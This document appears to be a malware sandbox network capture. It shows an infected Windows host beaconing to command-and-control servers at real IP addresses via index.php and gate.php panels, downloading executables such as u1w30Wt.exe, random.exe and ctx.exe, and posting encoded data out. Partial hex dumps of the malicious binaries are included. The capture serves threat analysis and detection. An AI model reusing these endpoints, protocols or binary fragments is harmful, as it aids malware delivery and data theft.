Dec 12, 2024 16:48:24.265916109 CET	1236	IN	Data Raw: cf e8 91 fd ff ff 48 8b 54 24 60 48 83 fa 0f 76 2e 48 ff c2 48 8b 4c 24 48 48 8b c1 48 81 fa 00 10 00 00 72 15 48 83 c2 27 48 8b 49 f8 48 2b c1 48 83 c0 f8 48 83 f8 1f 77 29 e8 b8 00 04 00 48 8d 05 b1 e2 06 00 48 89 07 0f 11 77 18 48 8b c7 0f 28 Data Ascii: HT$`Hv.HHL$HHHrH'HIH+HHw)HHwH($H_^[/)H\$WH HHHH t(HLH\$0HH _H\$WHPDHHL$ HHJHT$(HPHT$(
Dec 12, 2024 16:48:24.265928030 CET	1236	IN	Data Raw: 48 8b c1 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 83 ec 78 8b d1 48 8d 4c 24 30 e8 d0 ff ff ff 48 8d 54 24 20 48 8d 4c 24 40 0f 10 00 0f 29 44 24 20 e8 b9 fb ff ff 48 8d 15 2a 8f 08 00 48 8d 4c 24 40 e8 08 1e 04 00 cc cc cc cc cc cc cc Data Ascii: HHxHL$0HT$ HL$@)D$ H*HL$@HHAHAHHHHHHL$ HHL$ @SH HHHWHSHHHCHHHHH [3
Dec 12, 2024 16:48:24.265940905 CET	1236	IN	Data Raw: b6 0b 48 8b d7 e8 45 e5 03 00 88 03 48 ff c3 48 3b de 75 eb 48 8b 7c 24 40 48 8b c3 48 8b 5c 24 48 48 83 c4 20 5e c3 cc cc cc cc cc cc cc cc 0f b6 c2 c3 cc cc cc cc cc cc cc cc cc cc cc cc 40 53 48 83 ec 20 49 8b d8 49 8b c9 4c 2b c2 e8 1c 62 06 Data Ascii: HEHH;uH\|$@HH\$HH ^@SH IIL+bHH [@SH HL$PIL+aHH [H\$WH HHHA ~HIyHIHK(HH@t0HtHH\$0H _H\$
Dec 12, 2024 16:48:24.266021967 CET	896	IN	Data Raw: 83 ec 60 48 8b 05 21 9c 08 00 48 33 c4 48 89 44 24 48 49 8b f9 49 8b f0 48 8b da 49 3b d0 0f 84 80 00 00 00 48 89 ac 24 90 00 00 00 48 8d 69 30 4c 89 74 24 58 45 33 f6 4c 89 7c 24 50 41 bf ff ff 00 00 0f 1f 84 00 00 00 00 00 0f b6 03 4c 8d 4c 24 Data Ascii: `H!H3HD$HIIHI;H$Hi0Lt$XE3L\|$PALL$@AD$0HT$0Lt$@HL$8Hl$ uL$8HfAHHfOH;uL\|$PLt$XH$HHL$HH3H`_^[@SH@HSH3HD$0ALI0LD$ HD$
Dec 12, 2024 16:48:24.386464119 CET	1236	IN	Data Raw: cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 57 48 83 ec 20 48 8b f9 33 c0 48 89 41 40 48 89 41 08 89 41 14 c7 41 18 01 02 00 00 48 c7 41 20 06 00 00 00 48 89 41 28 48 89 41 30 48 89 41 38 89 41 10 b9 10 00 00 00 e8 56 f1 03 00 48 8b d8 0f 57 Data Ascii: H\$WH H3HA@HAAAHA HA(HA0HA8AVHWHCH_@H\$0H _H\$WH HHHHQHWHK?HLHHCH\$0HHGH _H\$WH HHH

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.10	49904	185.215.113.43	80	7820	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:48:27.928045034 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 34 34 33 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1014432001&unit=246122658369
Dec 12, 2024 16:48:29.278799057 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 12 Dec 2024 15:48:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.10	49912	31.41.244.11	80	7820	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:48:29.400707960 CET	66	OUT	GET /files/8199790517/u1w30Wt.exe HTTP/1.1 Host: 31.41.244.11
Dec 12, 2024 16:48:30.727490902 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 12 Dec 2024 15:48:30 GMT Content-Type: application/octet-stream Content-Length: 308224 Last-Modified: Thu, 12 Dec 2024 15:27:42 GMT Connection: keep-alive ETag: "675b00ee-4b400" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 61 5c b7 69 25 3d d9 3a 25 3d d9 3a 25 3d d9 3a 2c 45 4a 3a 26 3d d9 3a 25 3d d8 3a 26 3d d9 3a 4a 4b 72 3a 2d 3d d9 3a 4a 4b 43 3a 24 3d d9 3a 4a 4b 44 3a 24 3d d9 3a 52 69 63 68 25 3d d9 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 60 50 59 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0a 00 00 3a 00 00 00 2a 00 00 00 00 00 00 5c 34 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 00 05 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$a\i%=:%=:%=:,EJ:&=:%=:&=:JKr:-=:JKC:$=:JKD:$=:Rich%=:PEd`PYg":*\4@@@h((@P .text9: `.rdataP>@@.datap@.pdata@X@@.rsrc(\@@.x64`T`
Dec 12, 2024 16:48:30.727545977 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 89 54 24 10 48 89 4c 24 08 48 83 ec 38 48 8b 4c 24 40 ff 15 e7 3f 00 00 48 89 Data Ascii: HT$HL$H8HL$@?HD$(HT$HHL$(?HD$ HD$ H8HT$HL$H8HL$@7`HD$(HT$HHL$(*`HD$ HD$ H8HHHu?HD$0Hq?HD$
Dec 12, 2024 16:48:30.727561951 CET	448	IN	Data Raw: 15 96 41 00 00 48 8d 0d a7 41 00 00 e8 a2 fb ff ff 48 89 05 83 5e 00 00 48 8d 15 a4 41 00 00 48 8d 0d ad 41 00 00 e8 88 fb ff ff 48 89 05 71 5e 00 00 48 8d 15 aa 41 00 00 48 8d 0d b3 41 00 00 e8 6e fb ff ff 48 89 05 5f 5e 00 00 48 8d 15 b0 41 00 Data Ascii: AHAH^HAHAHq^HAHAnH_^HAHATHM^HAHA:H;^HAHA H)^HAHAH^HAHAH^HAHAH]HAH
Dec 12, 2024 16:48:30.727699041 CET	1236	IN	Data Raw: 8d 0d 4d 42 00 00 e8 e8 f9 ff ff 48 89 05 59 5d 00 00 48 8d 15 4a 42 00 00 48 8d 0d 53 42 00 00 e8 ce f9 ff ff 48 89 05 47 5d 00 00 48 8d 15 50 42 00 00 48 8d 0d 61 42 00 00 e8 b4 f9 ff ff 48 89 05 3d 5c 00 00 48 8d 15 5e 42 00 00 48 8d 0d 6f 42 Data Ascii: MBHY]HJBHSBHG]HPBHaBH=\H^BHoBH+\HlBHuBH[HrBH{BfHYHxBHBLH[HBHB2H[HBHBH[HBHB
Dec 12, 2024 16:48:30.727713108 CET	1236	IN	Data Raw: c3 56 00 00 48 8d 15 04 44 00 00 48 8d 0d 15 44 00 00 e8 b8 f4 ff ff 48 89 05 b1 56 00 00 48 8d 15 12 44 00 00 48 8d 0d 13 44 00 00 e8 ee f4 ff ff 48 89 05 d7 55 00 00 48 8d 15 10 44 00 00 48 8d 0d 21 44 00 00 e8 d4 f4 ff ff 48 89 05 85 56 00 00 Data Ascii: VHDHDHVHDHDHUHDH!DHVHDH'DHsVH$DH-DHaVH*DH;DHOVH8DHIDlH=VHFDHWDRH+VHTDH]DHWHZD
Dec 12, 2024 16:48:30.727725983 CET	1236	IN	Data Raw: cc cc cc 44 88 44 24 18 89 54 24 10 48 89 4c 24 08 48 83 ec 28 44 8b 44 24 38 48 8b 54 24 30 48 8d 0d b5 42 00 00 ff 15 cf 52 00 00 b0 01 48 83 c4 28 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 89 4c 24 08 57 48 81 ec a0 0a 00 00 c7 84 24 Data Ascii: DD$T$HL$H(DD$8HT$0HBRH(L$WH$H$H3`H$ H$(H33f$@AH$@3mQ$X$Xu3f$@H$BH3$$
Dec 12, 2024 16:48:30.727741003 CET	1236	IN	Data Raw: 50 0a 00 00 ff c0 89 84 24 50 0a 00 00 48 8b 84 24 f0 00 00 00 0f b7 40 06 39 84 24 50 0a 00 00 0f 8d a8 00 00 00 48 8b 44 24 70 48 63 40 3c 48 8b 4c 24 60 48 03 c8 48 8b c1 48 63 8c 24 50 0a 00 00 48 6b c9 28 48 8d 84 08 08 01 00 00 48 89 84 24 Data Ascii: P$PH$@9$PHD$pHc@<HL$`HHHc$PHk(HH$H$@H$IHT$`HHH$RH$`HHHD$ DLH$ ZMuA3HL$`K/HD$XH$H@0H$H+HH
Dec 12, 2024 16:48:30.727756023 CET	896	IN	Data Raw: c8 48 8b c1 48 89 44 24 10 48 8b 44 24 10 0f b7 40 14 48 8b 4c 24 10 48 8d 44 01 18 48 89 04 24 48 8b 04 24 8b 40 14 39 44 24 30 73 09 8b 44 24 30 e9 9a 00 00 00 33 c0 66 89 44 24 08 eb 0d 0f b7 44 24 08 66 ff c0 66 89 44 24 08 0f b7 44 24 08 48 Data Ascii: HHD$HD$@HL$HDH$H$@9D$0sD$03fD$D$ffD$D$HL$I;}pD$Hk(H$D9D$0rTD$Hk(L$Hk(H$DH$D9D$0s,D$Hk(H$DL$0+L$Hk(H$Dq3H(HL$HhHD$8HD$H
Dec 12, 2024 16:48:30.727834940 CET	1236	IN	Data Raw: 01 00 00 48 8b 8c 24 88 00 00 00 e8 4b fd ff ff 89 44 24 44 83 7c 24 44 00 75 05 e9 13 01 00 00 8b 84 24 90 00 00 00 c7 44 24 20 40 00 00 00 41 b9 00 30 00 00 44 8b c0 33 d2 48 8b 8c 24 80 00 00 00 ff 15 ab 45 00 00 48 89 44 24 48 48 83 7c 24 48 Data Ascii: H$KD$D\|$Du$D$ @A0D3H$EHD$HH\|$HuH$$H$HD$ DL$HT$HH$Eu$HL$@HL$ A DHT$HH$;Eu]D$DHL$HHHHD$XHD$hHD$
Dec 12, 2024 16:48:30.727848053 CET	1236	IN	Data Raw: b9 70 17 00 00 ff 15 64 3f 00 00 eb e7 33 c0 48 83 c4 28 c3 cc cc cc cc cc cc cc 48 83 ec 38 ff 15 5a 41 00 00 85 c0 74 04 b0 01 eb 3b c7 44 24 20 00 00 00 00 ff 15 3c 41 00 00 48 8d 54 24 20 48 8b c8 ff 15 26 41 00 00 85 c0 74 19 83 7c 24 20 00 Data Ascii: pd?3H(H8ZAt;D$ <AHT$ H&At\|$ tD$$D$$D$$2H8H8HA8HAHAHCHD$(D$ E3L33@P>H8HHH
Dec 12, 2024 16:48:30.848084927 CET	1236	IN	Data Raw: 00 33 c0 48 81 c4 78 02 00 00 c3 cc cc cc cc cc cc cc cc cc cc cc cc 33 c0 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 44 89 4c 24 20 4c 89 44 24 18 48 89 54 24 10 48 89 4c 24 08 33 c0 c3 cc 48 89 4c 24 08 48 8b 44 24 08 8b 00 69 c0 0b a3 14 00 05 Data Ascii: 3Hx3DL$ LD$HT$HL$3HL$HD$iHL$HD$HL$WH3f$`H$bH3$pHL$PV<uCfD$PD$Pf$`:f$b\f$d3f$f

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.10	49926	185.215.113.43	80	7820	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:48:33.865273952 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 34 34 33 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1014439001&unit=246122658369
Dec 12, 2024 16:48:35.207360029 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 12 Dec 2024 15:48:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.10	49931	31.41.244.11	80	7820	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:48:35.348370075 CET	62	OUT	GET /files/unique2/random.exe HTTP/1.1 Host: 31.41.244.11
Dec 12, 2024 16:48:36.675435066 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 12 Dec 2024 15:48:36 GMT Content-Type: application/octet-stream Content-Length: 1985024 Last-Modified: Thu, 12 Dec 2024 14:33:08 GMT Connection: keep-alive ETag: "675af424-1e4a00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 21 4a f8 9d 40 24 ab 9d 40 24 ab 9d 40 24 ab 83 12 a0 ab 81 40 24 ab 83 12 b1 ab 89 40 24 ab 83 12 a7 ab c5 40 24 ab ba 86 5f ab 94 40 24 ab 9d 40 25 ab f6 40 24 ab 83 12 ae ab 9c 40 24 ab 83 12 b0 ab 9c 40 24 ab 83 12 b5 ab 9c 40 24 ab 52 69 63 68 9d 40 24 ab 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 0c de dd 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 d4 02 00 00 b0 01 00 00 00 00 00 00 80 87 00 00 10 00 00 00 f0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 b0 87 00 00 04 00 00 f5 c2 1e 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$!J@$@$@$@$@$@$_@$@%@$@$@$@$Rich@$PELd@ZBn@h! @T@.rsrch!@d@.idata B@ * B@ehftnwgk0@l(@unlnktmrp$@.taggant0"(@
Dec 12, 2024 16:48:36.675463915 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 12, 2024 16:48:36.675471067 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 12, 2024 16:48:36.675595045 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 12, 2024 16:48:36.675601959 CET	1236	IN	Data Raw: df eb 6f 62 7b 6d 07 36 ba 83 69 01 db 99 70 76 00 9a 67 4e b8 f2 95 e0 19 e2 45 17 2c 54 98 09 5a 32 58 30 5f 0b 51 49 b3 48 de fa 3b ea d5 e9 74 5a 21 5b 6c 48 2d 51 64 2e f1 ad 5b 6b 68 fd 73 54 f9 4d 2f 1a 72 64 02 36 8d 54 23 f6 71 95 90 97 Data Ascii: ob{m6ipvgNE,TZ2X0_QIH;tZ![lH-Qd.[khsTM/rd6T#qUevApp5Gi]e\|xs7v]Vd'}/JSeGOcx_!; \|7]L[Ek{E[<"g/.1cQ:0@^K3 z5b
Dec 12, 2024 16:48:36.675611973 CET	1236	IN	Data Raw: c0 f9 17 3c 6c 99 cd 4f 19 f8 4c dd b6 a1 ff 62 41 7a fe 60 a8 f4 72 b6 bf 28 2f 71 fb fe 39 05 30 21 a6 99 76 55 6a 51 8a 8c 6f 28 39 db 96 65 55 48 99 ce 29 84 1d 5d 60 0e 94 89 03 82 a5 d8 93 1e 49 fc 7d 68 fa 4d fa 99 7f 9c b7 6d 7f 89 f7 c1 Data Ascii: <lOLbAz`r(/q90!vUjQo(9eUH)]`I}hMmK=L&"Z^9Pa\|!`)Y;x+VyKk"[e}i1f#=sq(epz)+sx2)MaXzwzv8Y\et[&W=l,
Dec 12, 2024 16:48:36.675617933 CET	1236	IN	Data Raw: 48 25 e5 7c 9b 73 92 6e 4e 94 94 09 33 63 5f 6b f2 e8 7d 69 e3 68 0f ed 00 61 a9 73 db 8d d0 bd 7f 6d 55 71 98 89 55 1b 46 5c 84 39 70 21 a6 10 88 0e 95 7b cf c7 b8 21 0d 1b 57 06 68 52 51 b1 f2 de 91 97 ff 2d d8 60 ed 92 21 c0 72 9a b9 0c 89 7c Data Ascii: H%\|snN3c_k}ihasmUqUF\9p!{!WhRQ-`!r\|pXZ[r;}blMfrs@JcTh&ajc`hZ="8%bM&jG[gG(jYn8gv#t~ yQmfQM@WH-WyPX_<[N2W
Dec 12, 2024 16:48:36.675818920 CET	1236	IN	Data Raw: 7b 9a 25 45 67 09 5d b2 1c 8b ee cb de 96 79 df e8 d1 1e 01 89 9f 16 13 f8 dd 8e 43 1e 28 b5 a5 63 59 05 54 c7 40 3b 15 bf eb 15 6c 7c 03 60 29 f1 df 77 1e e2 f6 ca 4c 8b 92 20 70 78 dd 30 6f 09 ab 8a 8e 4a 88 28 6d d8 80 ab e9 57 50 ab 81 84 af Data Ascii: {%Eg]yC(cYT@;l\|`)wL px0oJ(mWPk=Hn!{v}Rd7ur)Nj^oCuB2lAFR*?!5yuqHWC<B;%kzqyH g]U>]HM7!3 =?\|^syJy>VZa>
Dec 12, 2024 16:48:36.675825119 CET	1236	IN	Data Raw: 1e d1 43 cd 80 89 1a b4 bb 60 22 f3 5f 22 65 31 29 69 4b 45 42 78 57 55 0b 7b 82 4b 10 50 c5 d0 f6 e4 fb ac 5c 9e 59 bb bf 48 33 2d b8 15 2e 2f 9b 99 5c 57 13 86 fa 5a e2 36 c8 40 88 ca 6d 9d 72 4a 5f 55 bf 64 58 73 7b 02 30 fe f0 68 b9 51 06 0a Data Ascii: C`"_"e1)iKEBxWU{KP\YH3-./\WZ6@mrJ_UdXs{0hQF{5OQtez$5cv!O<M[9s*SQTz`]EM2]?8{QOjv'6DOv78g9M\P)DDZxP&BJFlR2@\2fX
Dec 12, 2024 16:48:36.675837994 CET	556	IN	Data Raw: 4e a4 f5 f3 49 fd 72 0f 8c 04 2c ef 9e 9c f4 bf 5c 0a 85 e9 03 43 20 a7 c8 b4 bc 0a 72 57 c9 3b b9 59 85 0b da 9f 2e 83 12 a1 6d c7 4a 82 a6 50 1b 73 60 bb df 36 24 99 10 46 37 3b 7c 04 4b 40 7c ba cc 66 6f 6b 25 c9 77 46 90 b5 34 fa 71 6f 0a 42 Data Ascii: NIr,\C rW;Y.mJPs`6$F7;\|K@\|fok%wF4qoBiR(M&"Fqd#8wN@%A`(h7q#%=ih.9:S.au\|j FekiIU[._,5+0=]yqhJz}?EQ\}9zzm=
Dec 12, 2024 16:48:36.796211004 CET	1236	IN	Data Raw: 0a 9a b8 ed 99 ea c4 94 88 94 70 71 96 03 21 4c f3 f6 4c 4d e4 13 eb 63 30 1b a4 f7 3b e4 b8 6b 7c f5 e3 ed 0a 41 72 92 c5 bf 57 06 a4 ba 82 42 9e 24 5a 3a 77 04 3c 92 29 6b d0 6a 7e 9b a0 01 7c f6 30 c2 01 d3 bb ec 83 6d 9d 9a 20 38 ac 06 3d 8e Data Ascii: pq!LLMc0;k\|ArWB$Z:w<)kj~\|0m 8=MV'LRaFy)dbOyO%#WYN#p=A)>Nnl>gK3JvL.g`[e]pnG7shuZn>BQZZK5y<otbAc;

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.10	49933	185.81.68.147	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:48:35.856524944 CET	264	OUT	POST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Dec 12, 2024 16:48:37.185195923 CET	257	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:48:36 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 40 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 35 32 36 62 39 30 39 36 37 61 31 62 37 35 39 39 36 34 30 35 34 64 32 30 62 37 36 65 36 66 34 66 35 37 34 31 63 31 64 62 Data Ascii: 526b90967a1b759964054d20b76e6f4f5741c1db

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.10	49938	185.81.68.147	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:48:37.308089018 CET	284	OUT	POST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 33
Dec 12, 2024 16:48:37.429929018 CET	33	OUT	Data Raw: 57 5d 42 1e 0b 1e 0b 4a 06 51 4d 52 4b 05 45 09 4a 76 62 7a 7f 49 62 73 1e 55 44 0a 5d 1a 05 1a 02 Data Ascii: W]BJQMRKEJvbzIbsUD]
Dec 12, 2024 16:48:38.966101885 CET	216	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:48:37 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.10	49943	185.81.68.147	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:48:39.089097977 CET	283	OUT	POST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 12, 2024 16:48:39.209259987 CET	6	OUT	Data Raw: 45 5b 58 05 Data Ascii: E[X
Dec 12, 2024 16:48:40.865557909 CET	315	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:48:39 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 98 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 05 4e 5e 16 4d 40 03 19 18 50 09 57 19 0d 08 17 00 0c 1e 04 00 53 1d 53 16 4f 18 00 4e 03 39 6c 05 4b 5c 45 17 41 5e 4d 1a 03 0e 57 17 08 08 18 01 59 1f 53 03 02 16 5f 55 4c 53 4d 1a 01 4a 55 6f 3d 06 19 5e 12 40 16 0f 18 1b 00 5b 04 4a 5a 04 1c 00 5a 17 01 0d 01 18 17 47 14 19 50 41 5c 3b 3e Data Ascii: N^M@PWSSON9lK\EA^MWYS_ULSMJUo=^@[JZZGPA\;>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.10	49946	185.81.68.147	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:48:40.987169027 CET	232	OUT	GET /ctx.exe HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Dec 12, 2024 16:48:42.321104050 CET	1236	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:48:41 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Last-Modified: Tue, 10 Dec 2024 15:45:48 GMT ETag: "5a452c-628ec5ffff268" Accept-Ranges: bytes Content-Length: 5915948 Connection: close Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1c 09 0d a3 58 68 63 f0 58 68 63 f0 58 68 63 f0 13 10 60 f1 5f 68 63 f0 13 10 66 f1 ec 68 63 f0 13 10 67 f1 52 68 63 f0 9b eb 9e f0 5b 68 63 f0 9b eb 60 f1 51 68 63 f0 9b eb 67 f1 49 68 63 f0 9b eb 66 f1 70 68 63 f0 13 10 62 f1 53 68 63 f0 58 68 62 f0 c9 68 63 f0 4b ec 67 f1 41 68 63 f0 4b ec 61 f1 59 68 63 f0 52 69 63 68 58 68 63 f0 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 2c 62 58 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 28 00 94 02 00 00 58 02 00 00 00 00 00 d0 c0 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 05 00 00 04 00 00 2a 4f [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$XhcXhcXhc`_hcfhcgRhc[hc`QhcgIhcfphcbShcXhbhcKgAhcKaYhcRichXhcPEd,bXg"(X@*OZ`lx`"h@P.text `.rdataB&(@@.datas@.pdata"`$@@.rsrc@@.reloch@B
Dec 12, 2024 16:48:42.321244001 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: H(/H'HHHHHH($HqCH\$Hl$ LD$VWATAUAWH H3HDIHA.L
